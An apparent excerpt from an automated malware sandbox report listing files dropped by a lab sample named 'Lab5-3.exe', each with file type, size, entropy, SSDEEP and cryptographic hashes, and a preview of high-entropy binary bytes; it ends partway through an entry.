                                                                                                          Preview:...Er...QN......2pw....7.....M..;Z&..o?S.d..N...0.V.......&.1..n...a.W&....V..8..{...X.k.n.a4...E...B]...\"..[T.w.q.o......C&.v....n.....-...ap&.+.O..p.d......d.....W ...)j.......)P.....C...\.V..%.8&|C.r..U.^-.*sP9.......\D5..."..59$0{...........@.B.,_S=z.,.....O.G$.._........7s=(..N.~C.Q.....1f<u..+_sx~.p,.A.h.3.`;.I.......L...W59Oq..-M.....z...."7+...&fT...v_..#9..wEo.....l#[..Q..D.........z.......v..p..cW.....8.A:W.hx...2.,<O.g.>..4...x!...k..|...A..=J.Nu ._..`.t...mH.x7.>z...V.....2J.%V...eX.d.z.U/...&.....w.3..?H.....3...9.~..Z......2....1.G_........l.....A>C.'.v.....'.....E0b.G...1..I.....,...M>=@...9. .U]..+/w..P.V\.........Z.h.".6'...?.4a...s......k...G...n.z4[.C.AZb..$Y..T.jG.@..O.I..)............D.e..e...1f..&'.Rz.mC5..B.?......4...&yW .....}..?`.8yI..H..tq:.......".%....y...u...g....&.6.5bg.L.^...........BU..)...9.I.G.+sg...CI @.8.^....nY......=....^..7..<1.u.d,.L.T..W..[....2..(7ge:b........*!.8.....X.9Y.%e.a..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.92971235664241
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:r41rBsNJ9OQ/G1XC9Ck3YXve4CsXU2AXgEl3WzphjJaP699PvHfUTid3hBaUoSG0:UrK79OQjNXAXvW3gp7aP69l0Gx0uKeYO
                                                                                                          MD5:34A999CB85D7BAA949DCCCD0962A52F8
                                                                                                          SHA1:0BC9C3F648B2E7D6B0E725EAD28BF435AB8A5903
                                                                                                          SHA-256:596CDF7D331E5578FF5160420453EE23BBFCA714B98B61E7E8734824A598B02E
                                                                                                          SHA-512:CFB29104CEA87D18098A936F1F4F4FC89F06996B3B25DC65C97877243652C9625972FD78D2683E77B9B5FD176031D3E29EC29652A5CF6357E38BEE1803319027
                                                                                                          Malicious:false
                                                                                                          Preview:.#..P.c>..Kg..u..I\[-.C...l..2R].4.wy.i8.g.n..Fb.J...yg.q....n...)la.s@ZO.':S..~.ZO.Kg-9p.4g=9..`.+.f5.-.k.....$.R...B.......,A...|.<T`....B.r.E1.d.M..V....D..m$.qz....fBB.4.Rs..H.....$.'...........]P.....B.+.,i..L~{.*~.U..{.~... r4....<......0....Y.@Z..@.....X...2.Tz .~.&......Y2\a..4H.....#.-....w....Q..v.........5'...xl..8.J..b.......n.M...N...WMn.2B.......B0.).r.kk..m..Ej.E..b.FZ...s.f.>.........7t.Q..Q.0 ...bw....T........e0|.......M.. ..S..z..uw2..L&ys.....$g.A...v+.m.[.....CN..X.O...J...@.M..dB..<.-y., /.!......?.2....,x.t..`2L.V"..=.....j.`.uy.v#.G;.4..L....i....7..)..{?.5!.'.......w........Hj....J(.63y...~x..g.......~.@..w.q..z....";/.nW.z...v.`....'.+....E.&..TV.#l&....|.g.f<ef.x..|d.m..Z..a...G...t...Ae.|.Tr..{...j..5.K....u.0..`9.k.T.+....O..Z.W.t2..~[..4.x~..<>.....y".[...(...q7..VFdh.(C....9......^4Z..0.8...J6.r.^}.._I...n?...'............... L...O..L..<X^...`.8.n.m.F.4..&.... z.j..T.MUEQIz.I.Ee.X%.(..^7..MB
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.93440191611944
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9eO622JZrlaHKLFphl6j93DGbOLJIPewTtVskZ9HfUTid3hBaUoSGFcmeykEdEE+:9eL22JFlaHyFN6h6CLJKT4kZWGx0uKeR
                                                                                                          MD5:3045F1F70BCFDDD962BBBF0B778E792A
                                                                                                          SHA1:CBB415FF56A2CF2959A7B7934FC47CB24024E01C
                                                                                                          SHA-256:4BF40B873D718840ABBEB0B07491FFEE1AC345E41749A34C09022095FBEDFBFD
                                                                                                          SHA-512:11A3F86263506D534CABA1DB1BE721E7336160C2732EDC73F1BC8720D341E588085122C4CDC6BE2DF0B2C3E225F50E89219EC8C8D6618B7E48156E1EF9FA86C6
                                                                                                          Malicious:false
                                                                                                          Preview:#//T.d...r..{.@Q......aX.?'.ek......C".u....L.....k.t.....a.[K.s..H.[.;;.:.k;D.L(.UV(....:r.(.G...... .y.........y.m.|C....O.8.Vbza......-..D...d.....Bw....g.?O..h.t...fj'..@n..XHG.d....l.@..-......p.......CO"..Z.}..yH^.lp.LL........s.=.?..}CVg...%.+....'h..x..>.mh+.....W.3.!..n............u.f.*1...m.9....|#.)....-.'o'..B./.J.+....L......>.....I.+."7.....J...jxw..E....3KWR....q...N..P..I...$/IG........Tv....HG..p....$.C.w.H....s..W..P.~..[....Y....3U........'.......=.U..2..H=o....|...6...L=..>X:.}...u......+..kn{..!.QS.C....N.j....V...j.5. .W.u..k.....g......%v..%=*._,.a...8...lv..e...e.y...O.V...... ..E.o..?v.Ru..A.~`..>... b.....Z.2.g..,...Qy....Cc.?S..q.H.a...uy4..14.....NXK.xW.M._.Y..)..;[.E..s.Fihs..-H .n.........8m.{....6.f8.. ....D-0...k"..2o..z}...S.......^P5...Y.+CE......D....[...~|_.v..W.g[.......(..;"&.-...=..m].i......Uw.nH@h.....3n/l@.S..:.u.J..'.[.f-..4........:.-..F&F....p..zXa3R.l...o..xX..L:Q...C.Fe....."..:....._..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2896
                                                                                                          Entropy (8bit):7.938687560127248
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Mn2UmRH7tg4s3QoHtwBSDwW1mm+niChYsUEHfUTid3hBaUoSGFcmeykEdEElU92i:M2Um04sBDMjtFzUDGx0uKeY2ElUJ
                                                                                                          MD5:B94723AC018C715E22359342B542A97A
                                                                                                          SHA1:4990E88B5E9F2B1F15CFD9CF84F3A0FDEF03477B
                                                                                                          SHA-256:AE781EB9529E24E7050CE6B3D73DAF5D2C6EB6D9228F2F3467A03C4F17467CD4
                                                                                                          SHA-512:2BC59EEFC9323842E61D766062FFDD12FB9B3C8B799CE162C0E03066AC7EEADB6069D5419E667C30173007C2C623B6B5C6CA057E47E0E5724540BBA2FC626DB4
                                                                                                          Malicious:false
                                                                                                          Preview:e.'k."P..<.+.....o$A.......8..Y%..z..0ME=3f.....V...pd{..f.).`..U..o.|.k.....a.^>S.5c.l.G...JU8.{z/...'.....k|....5.....;0W?Q.rC.K.Y..,.^b....1....X..Pj7/....vk..a......7SO.1.".0...V`b...?......+0.....).g..Xh....{.~..n@."....'.%.....w4.."h...l.._....>.3c#0.v...#.T..D.K.G:'.w[2.T....W.6..f...v!.....*..t......wZ..`.....o#..H\8._.f.$........M..&k......j...j..Jt.&7..KH.!.Ii...n.OFU..Z.....[KW..b..X..j{....|..d......L...`.k..V~=...]Y..l.!..#......,..A.V.......\.X..,..j.......1a.>B?h5..c.3fVW......;.R..)...!....a..bN.}....J......$*R..|....O....[.=USp.F..H..3*..*M3.v.t..qG..WG....T\1>...B^.k.7."..O...3......../..f,.s....k...0.Zn.{......il.../..l..&.e.......V.W.........Q>Y;L.....p.......^....!...zn...Rox.U.i_.>.....i.W0. .X?.-rO5......do]7...d._NR..f....oEE...O7a.t ....p.....|6.Y...b.d.U[.3ebP&.....0...20.fc..+.f..u....0...N*...r:.......U..j.... ...Qh)...L.;..@......&..f..LQ...\h..Cl.O.....,h...a..j...?K(\.02......#.fl..q.Q.HL..i..4.G$.b..5...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.927194540632397
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NFVv70rsGF60enuvIdpVa8iZ1iPSVewK7fHfUTid3hBaUoSGFcmeykEdEElU92i:NFVTTG4BPlaLQKVewK7kGx0uKeY2ElUJ
                                                                                                          MD5:F779DDB49EB83988F5B72084A0212B4E
                                                                                                          SHA1:AB2397F780EDF6349A5CA76B2CE1521D61B94685
                                                                                                          SHA-256:36AFF83337C6347CF9CDCA877EE1F39E5C245020E3156DCDAC8C754B86B0A95E
                                                                                                          SHA-512:2638FCA88349DB54713C4C18CD3C2E9CEA08D88DBCA467E96F34D58C0D0C9760ECD9EBD7C8A2CBB6B5047216B2CD8CA9A39A0352FA5E13D57CC0B34593AE112F
                                                                                                          Malicious:false
                                                                                                          Preview:....Ei..p.Q.z....=..#.<..;.R|;..{....|I.[%k.\....<......]..G..4....nn(..2.NU!......P.c1........A...Q0.....Q.B........k......'{$.....0....qeN.+...O.l......J.1.{...4..c.....Lq...z...Z..OpW7..F...V.Y{.py.....q.c...q...!....%te.X.i...!ct.,.4U..tF...\jE.Qa..Z.1...&.r.ynt..].{......r. ......+._4....A.WZ..#.If..."p.)c..HE..6..c..*4Y.C...).o3.|......H\I.....(d.....'.....w........o.D.O.bRl./u..h........{{,.4..9.<...4.+.h..&..[#)...I......_..(....7&.9.....1TM...J@/..n;.Sj.#3...d.i...s..b...........Mj..'...N.0~..l.[}.&:....M.K..)d.......,G.;z...K.lZ..^%..TW..y.L..7.4T.%.+.vM......~...bA..b7q..0.X-L.\.....J32z..-......kt..jH.IK......T.....kMn..)...i<....p....u....Y..Z.............O...9..?K.WJm|.Y.x....}..b.S.!.q..Sj..zu...Hl=..n...6....).zX.R.>.Q...{..N*..7.2.o...-..K..>u.....La...us.F..?..D.vc./..U.g...#.~*{.<.(.G..:..0X.........k..s........p]R{..us9...+.@..."i.M.2EW...S..s..r.j.B.._.nD....X0c...Z...!.....O5a.l...7.8.~{..........G.QE.&P.C.7.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2880
                                                                                                          Entropy (8bit):7.9343463247444905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZCJlgnYhlU4HU52jUZZrfWb7OzwMnsCzAgAHGHfUTid3hBaUoSGFcmeykEdEElUJ:Z2ZdU2nOUM/zeHZGx0uKeY2ElUJ
                                                                                                          MD5:862EFE91C89DF6684A1ABB400F5A18EB
                                                                                                          SHA1:6D021F3B6EA891F316D967BE96550BFAA227C6B3
                                                                                                          SHA-256:31607F3E612DCC594F0567691F33D12455EEBFF46385146AA9ACCD249B613905
                                                                                                          SHA-512:33B0D6E7CB3C0CE6390CE2D14D1712417B37F67678AC228D3D894D8B6C2C0DE1CB16096B93F677535CEBFB9E42574FEFCBD74BF691058E95014F580AD15309DD
                                                                                                          Malicious:false
                                                                                                          Preview:?..f_Z>...F. ._.3.u.n.k.B.v.Y.E.2....P....<;.".^6.[lY\.....O..[..1.?.j..vn.=...._wl......w.O.a.x..u.)...*m....Ha..NQ.Yz...Q`...-.5>..A..M..Q...RR...}...p<.iL.10.;.P-Q./`..G^.......b...!4....E.;$..3D.^.V..@n......=.:..4..`.Fg&47`....,.%b.......s...,..L........\.V.....fn,M3.#[..._...b........U..4C..f..J....t.....=....J......|"1R..:3.9...C.....7..,\.8?.18. a...s7..Ou5..gu@b.~j........3..S...j....$JP.. ..t....~..).a.U.t...Y...g..7. @.!a..KR....0*a.N....a.....l"9...E...&^3D......n.A99.\.......ew.du...4 n.Uy..E....5ykpg,4,.d.CV..?.m.~..3F......b..........X.@8.@.C..h...&.........3.N.ty.>....X........'...Qo..B../..T........51...a..3-..;.of..z.A.'.}.$#Tt..,;p.O..3...+..z.!..&.\.R.!$.V..p`j.{.O.....C.S...Qmy.*Eq...Z...h.I..Z..i.T5<.6:D....}.....w|....V...B=..$....9.....U8..#.qt......c..........TX.dR..}.....}{.0.$...b....E........P".L..mj......D..I.....%/.>I...._.....?;.....k..V-......".k......1.y.z.#..f.......EZ...|jSI*..d..<..".V..Q\..3....C.t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3056
                                                                                                          Entropy (8bit):7.938085734255717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8RxHhZMun4TXYJ634LV9csqk+CgGJHfUTid3hBaUoSGFcmeykEdEElU92i:K9hZMu48634Ls5DCAGx0uKeY2ElUJ
                                                                                                          MD5:05EC21881135B4AC915A582D91998FD5
                                                                                                          SHA1:C0C8EDF2F8CF55D9CE194EF16E686C043FA37C4D
                                                                                                          SHA-256:DF45CD6856870D2D03AF1F2B1287E953DA1A33949811B68F181E063BEAC64299
                                                                                                          SHA-512:B6F64609F353351C96144082E7A34957729A65ED3EE8AA0A32A08AA6313BC3EC711FA0C0B593E205FA39AF9A21F3A06A21C8083568467822B0D1BEA6615AF10C
                                                                                                          Malicious:false
                                                                                                          Preview:..]..........h.y['....t.m]R..F.......U.r.....L{...&....t...N.;...kO.;r?g$.@..._.Oq.^=.....g..07/..~.K....).J6..5...f+.8.'q.).V....h..H.......4.. |.....-1..D...w....'.$..J{......#...V}q..D.....CL..j.-...rG.T.+...b.....sQ....!..H..q..p(..0.D7.Eg..G.x.IE.nc.)Er....iK...Z...}..s.^..R.......ttT.|..C....c.&..z..v..H..@N_-.U1N.F_0"E.H....a.+......`..h`.:.9....Q.x....}n.m.^....OOX..A.9.yI......~t..i.....d....^..W...6..5...1O...~|2z...)7Sm.:......]....../f6 c..8.j.D.S.t...0V.Ur..../............O.U.S..9..FV..G........$.... P.n0...u.+'m83.V.2!.$..s.....{z...r....;*.?..O..OJ!W....-K*..7..!rq...1z....|G.E}`u.Y...6...(......~2.^.Nw.=.....m.p...{0}.E.P....|..Z.....A........ZK..Yq...)..F..Pai..^....E....*....{h.&.b1.k...Z.UO.$....r.Y.I.Z7...7_..n..Y....#NL.I..<.~......<s.uX..c..m..TM.'......N....:..1.I.7.mK...a..V.&...H..--..f.F..tg...0.r..=......=IV.n...:...@..6.}.L..~..lW.-.L.i..|..&Xy.>......c..-.b*.@..j(......r....[...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:PGP Secret Sub-key -
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2992
                                                                                                          Entropy (8bit):7.937374775008126
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4bd5oeIXmr5m0UPyP9KtXy9CNrhEy85hlPHfUTid3hBaUoSGFcmeykEdEElU92i:4x5oeVr51UPyP9K1yKrS55DUGx0uKeYO
                                                                                                          MD5:C70D32E993977580D74135AC3CC6F509
                                                                                                          SHA1:E357C0E18929D4C8352946438AC6D4636D11BC28
                                                                                                          SHA-256:2AC2DA2726985F5CF5BC27EED6B7A6E1C76C535A0E5A4D6D62E72AD1667F8226
                                                                                                          SHA-512:FABF7CDE79F61780DB232E10DC3D2B48AEEB1121C304F882DF609A01365BC9A5D1CAB6CC83E989AB251E7BED456C2181B0666BD69F224486790DA82BEA486F44
                                                                                                          Malicious:false
                                                                                                          Preview:...I.V..S...zD........=...<....Vl."d...5....~...m......._.....%2.+d...Ry.m.....O.1.\...[..OE0V....Bx.\.S.E.3..D_Y..q%.F.@.~.M0p.....lv>.r...J.5........(.].'.o.*b..K...d..D.T...*.m.......W.!......Q-...\..b.J.."...S.40...\'.srx........%...31.q.Z.0t.f}!m..._...Mn..w..4.O.q..w.@.c...`...j.....M7-.~....Z....\.:.&.o.b.......t."~)[tBi.o.>.Va.e.'..8..}.w....$^.*3.I.P..^..g<......SD.:.=O....p.+.4..).GA.@.Q\3I`..Y.'&.$?.P206Ob..1....A.d...l.Al..5. g.q.n.....sM.p.q}z._...A.......S.qkK..J..........I.b?.^xx.q..D..F..~/.......T8..E4..W.........=~\.l{j.z...tb..c....D._....`T.n.F..&...@...D..)..i/...,..@6K&.....k..I......3<......e..s.-2.>..q0.....v..f.........\R...^.}&.2..........z.....Z..1R]D_.id1.....R....h.uC...\...o.{w.A.5.h...j./N.....v...p..7i......3w7d._.f.......8.....AC....j?~....:k..B%'..TO.....ml..z......r..g...q.J0.&...`tcD.2v.#>..Ow.$ELy.S=kIt.N.i.....7.\rJ...p. .E.:....z.)1F.XayC.ukM.~e.e2...@......Ww,.-C.(mT.3"...-........x.s.....`
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.945440904424037
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:W9cIsCXu3Rap1emldLip08GJJTRVtpHfUTid3hBaUoSGFcmeykEdEElU92i:mm3RGbdiSJPqGx0uKeY2ElUJ
                                                                                                          MD5:F49483173ED316D4E1C20BD266134868
                                                                                                          SHA1:D67534B93737140B8A7A188CA44060D7BEDD9F33
                                                                                                          SHA-256:1F105022CD25FA91379F317EB7C03C31D91603D9FCC6CD21CB8CF6351AECFE98
                                                                                                          SHA-512:854BA824D913C60B47C9B480F6D80E592BEE9B912F18101FC8EFFFDE885DD6FA61CFD0ADF58DE7D706F1C2E5BEE2BF513CD2E7E42352DC7C11E99DCF90AA13FD
                                                                                                          Malicious:false
                                                                                                          Preview:...e.WBSS.uz....C...|.A.w.B#<..ie.ZMz.|........J_...=.<Iw.....1.c\...A...`.zd........[.&.....h.a.j..h...M?......?...8.(ac.......!.F.$.\h.......>.;R[/.@%.ru:f2..i....x.r..U...>F..}*..Y[.[h....L.qFj.X.`..D.....F"j..<..U..y.........;.(.*..oO.....':...F.}. ).....vv*j......Y(|.[..]..a..@dt ..#w2.$..._.ZG...R.........N.J....j.U....4....h.e...-.".H.A...s.c..!...k.y.Y.?.w.l...y(.;.X...9...t......].Nuv.H.....'J..d..?+JZ.2.T.>.1Y....2...n..T.....X...g....,.kZZ..L~......k...../_..c.I....3...~?5....b... .cx.._&2@A....1N.$a...]e..6..J.>......a.[.@....X.:H...\...zW.0(v..Gf....4..'..$0JW..oU[cg...)b...Si..h...b^.K..1x!...sD..2........uz....yo...:F....xgA..........}..-...8..^.t.n...}.....$...0....g..>.K........f..l.......f.om....M.[.HXq.(.....qpG8.$.5.D3...&KEp{/.4'.W..^Zc...t.Y.......w..u...wK...Zb....>.d...|...u.L..7..j].....1.i..eK..a!.r....#/..(,..^^d......Lf..s.R...C`....@....l...x....vK8..=.K5.u.....N...9......e.."D?ev7..7.....q...~s.%.q..j5.._.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.936039909591764
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4OPRls3UNbVSA8fMNLhtQvFju0MrDqDbimRto+HfUTid3hBaUoSGFcmeykEdEElk:4OhbVZ8+1iNjErDqDmamRGx0uKeY2Elk
                                                                                                          MD5:50CF9B86EBDD7B424347441D3175557D
                                                                                                          SHA1:E633E00C768B27151D64E495E70A4211D33ACDF2
                                                                                                          SHA-256:3851145CE675E6D79F41CD6B7AB3033B541AB70BEC057B483A9B3143A63A5BD8
                                                                                                          SHA-512:B165C15A29FFB1B8FA48B9EEBD8694F62B948F3CCF03080A973DEA5A479E1D364814F3542DECB1768621DADFA4B11DDF5E9A3C2865E7D44847E35F54F515A546
                                                                                                          Malicious:false
                                                                                                          Preview:..tK.a.".'.../FuQ...Z5.p{..c..2......{....6..m...q."..d..m!1,.....[J..S&T.\..Dw......<_%..XL^j-..`9.jh...PKy.....V.X5WJ.S.a#|....].Q.r..V5..q.o........`..S.9.qJn..Q,.1.o.....-..}.0.kl..X.6..1...Q?..e..#.:`.Aa..U............S....#.j.+M.&.OU....SS.f.........{.Avv.0u.^R...{....l...5..sE..=x........x.W......|..S......."V.........\...`.%0l.....5...W.n.U...V.)...Q.(....:...*EH........d)`....PL.G..V+..~..E...y....,.........V?.\.A.c.5....8.......&.#%..9.g..X.;.*%............j...b.+jf.T...`..9..M..#..{Ez9.......baB&... ....<.&.1......L;...j...p..d...H.&Y)..H..ux.q.f.O....G-.o...*..h..8.s..u....N..^..3}..2.8...JK..%....|...*.....U.].0........x.o..J...\..$m..*un....B.`........gd&..f.Y...!.t.....4..<..l...yE......0.Q.O.].n..;C..O...gO.l.\...Q!.G.C.?....o).qY.t...I@I{.....:.....>..j.Y.......x..84....H.$..5....._c/....1....CA.f...uJ...4}....3...MS.$..u8NX89...7T.nIK8. ...$...C.6...;E~.Wy.B.Z..1....<i.u...uP......~.....-he`..`....m.+.U6.C..g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2912
                                                                                                          Entropy (8bit):7.941492540043588
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IP1QZbbEqtFcpy7SnMGhuGDcl9+18YFIbHfUTid3hBaUoSGFcmeykEdEElU92i:IW12py7SnMOuGDcn+NfGx0uKeY2ElUJ
                                                                                                          MD5:7C2F7EDEB642FFA959E24BBB33D394F9
                                                                                                          SHA1:E875DCDD75CBD92EE1E937DB833F181D8F609F90
                                                                                                          SHA-256:DE55FF3873689C79A9C73E61305F14DA1F740DF0A72ADA1D9D153FE4939C9A07
                                                                                                          SHA-512:AA20A56273D45F7D2DF80A9D84CA475EF1E679E06455E2C1EDAFE5416D17E95597A62C4AC15875C35E3233A6C856B373E5E9BF14495FD7F4E915C1D070D0C09F
                                                                                                          Malicious:false
                                                                                                          Preview:...].....'x.C_.?...;.n.O..F:..Q..\...8_..a0.X..=.6..%.).6v.d...}:.k....d.A..~....2."!.5A9...~.. .(.[1.......dG.)....U......@.%V.R&v..>.X.........pJ7. .q.iU.4Z....k.'..w..DA..o.y<......KtJ.u.0.-m......2._...e..o.XH.J..aM..Q}J)...H..%!m.RL..Ry..:.@..34m....Y.}...^~P...;..E3N.Z:.d..."+M.......M.e......<#r~.8..hY.m..7 1\+,...1.AMI..|..H^:..>6..7y.z.<S..._.}f~C....cg.6L.[... H..&:y...P...O..s...L#...z..)>......T.#..."-....i.+.G.m..)T..;<....Hf.b..:....8...*X.O~G..*.F]...6....7O..d*;.....,.(..dA^.@..sk..]..>...R.f......R.(...k...#.g...>....u.&..3!.X+..'*....N........lu..h mX.)c?...es...8...:?E..Ue#~..rwX.V.....A..A..i.#:.....)n..GE.*h .B&....Y..w..52...}.vt.......Z...E';......p.b.g.&}.......H=L....8.......-....@..'.....^......p..|!dR.....\~|...TZR........g..WO.=....}.d.2T......Z..}.....%..1..4.i*R.e....E.mA...l.,...FC_...bG.P.g../Um.b&..h=.&.{..?.k..{T]...0L.L.s..Q....",..QS.V.K^.pMpEPj...B.W.Kx.......o.l:...i$.......oq.z2...(.g...YHl...C....r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.943444361655925
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:S9I8TKP6y7C3xb6K3/sNPJvcQmXeOzQChHfUTid3hBaUoSGFcmeykEdEElU92i:SRykxb6VJv9mOOzniGx0uKeY2ElUJ
                                                                                                          MD5:626A1BB636CEC3CF1A11CDA4280E3DD1
                                                                                                          SHA1:05CBD0A59DCD9D93B2049EC5D956DE613A0C47EB
                                                                                                          SHA-256:F690BA5937B58B81D8398EAB5F00F4AE06E876152AE5AFFC610891944D9D7AD1
                                                                                                          SHA-512:A4EBD7272A1DF6F21F7B854CEBFEA38BF937A3E4C7717D2FC4512744C8E7BD507BA841B0C2ECDCA9F5EFC0F96D3673B107786975DAF345B64BED115196BF7532
                                                                                                          Malicious:false
                                                                                                          Preview:..^.0[..aQ..f+g v.........H.p...Q...Y..m...b..`FP...53::.)6.[.......M.X-V....9ih.T.....'......_M.........8 L.h.[tRW.%.\v?.....'.?#.W...Eh*h.M.o..tC.?i.S.[.X..C....4.0./...z.N.u.....9.S.L......;.#..i.t.5.J.Su.h.......\.]..P....3...TX..a..4.u4.-m.......C.D..0.....kM.zN..\..{.(r..#}.......i..$.....K.D...uO_.HZ..R.s.c..H.y..E.%K<...l...=...]..s..in...U8J>.7^\,./.W....D...\f].g......Nrx....{..$..f.y&.."...d.Y.Db&@..~n..k.ZIZ0.\tP.....L....}.?......v.%...`X.+.Y#.p!.!?,..&..no....Z....W......H......A..qq-..H...g..u.}.OY..8I...!.]...b.6..*.9O... F.m..g......#.v.....7W.N.S.MD...@..r|........*...H.....M.<t.:...<....+.+0*..I#..&#.h.....~...a..N.fIW..!...u0....}b,F.z...Dp.....q..}...;Re...V.....g..R.ba....,.g..i.U...i....B..b.Z..J.....,0l....C).j.|E=#Iy.h-....u..4.......G....Z..y4............=EG.w.L..4.._N..]..].....#..0....c.7\.5...(7.X<.)...[2...........2..A/V1g../....F........i.?.6.a.VD.S._.yFDE.i.f..F...`).D.0.=.pM...i.`....y.C2.-.c..n~.O.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3152
                                                                                                          Entropy (8bit):7.942745013943249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TQ/MEF+sSSiYBH7HaSvFZuXYxg+5b8F5XY0HfUTid3hBaUoSGFcmeykEdEElU92i:TnsSK7bxxgyOIGx0uKeY2ElUJ
                                                                                                          MD5:FBED53E44FDB973BDCE831E29158DB70
                                                                                                          SHA1:8CD36860D747F33586C91EFE6D368043251BBE5B
                                                                                                          SHA-256:8AF57D12CCB3732FAFD193EF933DA1E477AFC74085D5A8C998EAD8FD5AD2AE31
                                                                                                          SHA-512:0F10C264CF7B90A302B7A29FFB69B7D7B49B7A23305C24A0737174EDBE68CAD9CCE9BD684014820FB2B19239A671AB926262156A76315E7ACB2369E0E2E59988
                                                                                                          Malicious:false
                                                                                                          Preview:O..LY1...v6vQ..6...0.....+~Ev.X+.2...e.r{....k'.oL.n........c..WB$=) 8.R..&.E..D9@.N..k.....0..>9...=.ej.>..++=W.:..zC.3....*../I.[....nNHn.FW.'dz...2l...J...D....5..B..9.D...1.Q..Y..)-8..E...o.>l...|.aU.W.Y.*f....c...d].q.X.P{.j=.L...m......w..6%i.20..HHc....;C.B..zy.=.5c<..Hzf..&..r.M.U".=.".g..P,.N...Zq]+.....0d......t..q....+..gY..[....m.1..1.r,gy...1:trb..|.....$.YID3..?..f..5.'.!....EK.`.........~....&...x....L...1......E.......g7.......*..+....)..w...k...9H......R x.....mA.......w..3t........B.)F......M.Q.X...v..iV.jp:>C......<...\.BTr.....k.6.....<..(.Z.6.#.6...r!.I.....V.3......U.....R..xpX.....po3u..>.T...H......y..TH4...U....*.j..O.^.4......7..j..I..6(.....e.....(....R...aAK...5..'.Z..~vn.eg."...:yq#.K.....:.dK.li...}l..R..\.~....h.oh..J....u..n.".....i.*..K1.L.4.....z.@G.}.G7...\.......Z.2.X......1u...~..;_..I.o. -9..e..b!.rgo.....p.S}....C.N....u.....0`o.m.'3r.....L.U..P.[.:A..m.!O...i.:..I...f..O.]hK....q...2Q..o"..d.<s...0..x3p]1".Qo.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.947485399762423
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:m0DfPZ5omRlyLChOm1kxdwyyG5+HfUTid3hBaUoSGFcmeykEdEElU92i:m0LVryTv3Gx0uKeY2ElUJ
                                                                                                          MD5:3EEF9A35E5E9AEEEC0455B51DA0E412A
                                                                                                          SHA1:60F27C2C7F3D0D102CFF82957284EDB16D907211
                                                                                                          SHA-256:5F659B6C018D5C8C4676076AA813F8AD16F9024654D0C2AAED7697BE1CB17A34
                                                                                                          SHA-512:07A4E9E7E7BA0EB5A08B9FD382D8C40E69E31B3A6670400438D4089CD5761CAD2AADC734FF6D2F889166A0ECDE7691F456F7DD9B4C26B4BC1E61F8370E144C23
                                                                                                          Malicious:false
                                                                                                          Preview:F.A.R.=.w.;{...hG. ....T. O#........../..6...L..N......-.4.g,.....=oZ...6.y.i....jl.}I.<.$.....z.^Oe....I..\e..2.M8qi.=.e..Ef...wQD..}.TQ;...#.o=\%e..7C.4...G"X.e..O.E......M..y.S......M6........:\.!&...1.G6K.../uP_G..^.........)..2:...%........a.J{w.n..Y@ .c.G......&......v...iMO<u.pkY....3j..G.p.G4..".....|....IC...!.[...h....=!....RU6yMv.(.6o$...'....V..2.!(5.C...T..$...{.]).-..q.sp~.......@.gX....-u..! 8..T......r.i.=.U.y*.'..!!..P.]!qhQ?.i.N.~#.s.E.p.M.&.V't.$.......o.7.>...x.....)....;.....d.&....3.V...Zm\o.m3.-.F......i...S.f...J...Op"*...!.....cZ&r..s..3.1.em.^!/.2...........a...P..Jb.mw.Y&.5`A.E...4.m..[.....7....#.x9#.=i%;...y...v.dp.5~..'.Fa.=..Q8!.K01....&.@QA...%[.N.X...N.i....m3..w(.\.NK....W...~T....y.KOX..x.......@..|......:.... ..tl.c\..L...b.W..W.....a..e..C..e|.P.....`.....V..:..,......D.......f.a.W..v.X.-c..:....Ot.....h$Yu...e.^..+..h..Ni..7.>...0.&........G~^_......~CZ..|...0+.x...........^...a....;j'.$.u..i5-Z....1..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2848
